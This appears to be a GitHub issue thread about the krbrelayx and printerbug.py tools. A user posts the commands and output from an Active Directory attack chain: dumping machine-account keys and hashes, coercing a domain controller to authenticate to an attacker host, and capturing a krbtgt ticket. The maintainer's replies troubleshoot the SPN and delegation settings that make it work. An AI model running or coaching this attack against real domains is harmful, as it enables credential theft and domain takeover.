Printer bug doesn't work
girlgirlbest opened this issue · 6 comments
Hello help me please ; I'am read blog;
Use secretsdump,get account machine(computer.test.com) aes256 key & lm:ntlm hashes;
Add dns A record for my attacker machine. For ex. attacker.test.com
python krbrelayx.py -aesKEY "aes256key"
python printerbug.py -hashes lm:ntlm test.com/computer$@primary-dc.test.com attacker.test.com
printerbug output:
[] Attempting to trigger authentication via rprn RPC at primary-dc.test.com
[] Bind OK
[] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[] Triggered RPC backconnect, this may or ma not have worked
krbrelayx output:
Procotol client ldaps loaded..
Procotol client ldap loaded..
Procotol client smb loaded..
SMBD: Received connection from "ip address primary-dc.test.com"
Unsupported MechType 'NTLMSSP - MICROSOFT NTLM Security Support Provider'
SMBD: Received connection from "ip address primary-dc.test.com"
Unsupported MechType 'NTLMSSP - MICROSOFT NTLM Security Support Provider'
SMBD: Received connection from "ip address primary-dc.test.com"
Unsupported MechType 'NTLMSSP - MICROSOFT NTLM Security Support Provider'
Computer.test.com =Windows 7
primary-dc.test.com = Windows 2012 server
attacker.test.com = kali
It only authenticates with NTLM, which indicates that there is no SPN set for the cifs/attacker.test.com hostname. You probably skipped the step where you'd need to add an SPN for that host as well.
In your blog, wrote need SPN with service HOST/attacker.test.com;
For me now worked with HOST, but i get one more question;
I usage printer bug versus primary-dc.test.com
Krbrelayx output:
Got ticket for primary-dc.test.com [krbtgt@test.com]
But if i'am usage versus secondary-dc.test.com
Krbrelayx output
SMBD: receiver connection from "ip address"
Delegate info not set, cannot extract ticket!
Make sure the account you use has unconstrained delegation rights.
secondary-dc.test.com=Windows 2012 server
primary-dc.test.com = Windows 2012 server
I checked , both dc have unconstrained delegation;
I'm not sure what would cause that but for some reason the secondary DC does not think your attacker account has unconstrained delegation.
Great thanks; Last question )))
If i'am usage printerbug.py versus Windows service 2008 sp2
Output:
[-] SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
Traceback (most recent call last):
File "printerbug.py", line 198, in
main()
File "printerbug.py", line 191, in main
lookup.dump(remote_name)
File "printerbug.py", line 77, in dump
self.lookup(rpctransport, remote_host)
File "printerbug.py", line 87, in lookup
dce.connect()
File "/usr/local/lib/python2.7/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 800, in connect
return self._transport.connect()
File "/usr/local/lib/python2.7/dist-packages/impacket/dcerpc/v5/transport.py", line 400, in connect
self.__handle = self.__smb_connection.openFile(self.__tid, self.__filename)
File "/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py", line 547, in openFile
raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
python rcpdump.py test\administrator@"ip address windows 2008 server"
Protocol [MS-RPRN]: Print System Remote Protocol Presense
Not quite sure what causes this, could be something 2008 specific but I don't have it here to test.
In your blog, wrote need SPN with service HOST/attacker.test.com; For me now worked with HOST, but i get one more question; I usage printer bug versus primary-dc.test.com Krbrelayx output: Got ticket for primary-dc.test.com [krbtgt@test.com] But if i'am usage versus secondary-dc.test.com Krbrelayx output SMBD: receiver connection from "ip address" Delegate info not set, cannot extract ticket! Make sure the account you use has unconstrained delegation rights.
secondary-dc.test.com=Windows 2012 server primary-dc.test.com = Windows 2012 server I checked , both dc have unconstrained delegation;
@girlgirlbest how did it work, I have added both HOST and CIFS but did not work for me . Still getting the below error.
Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'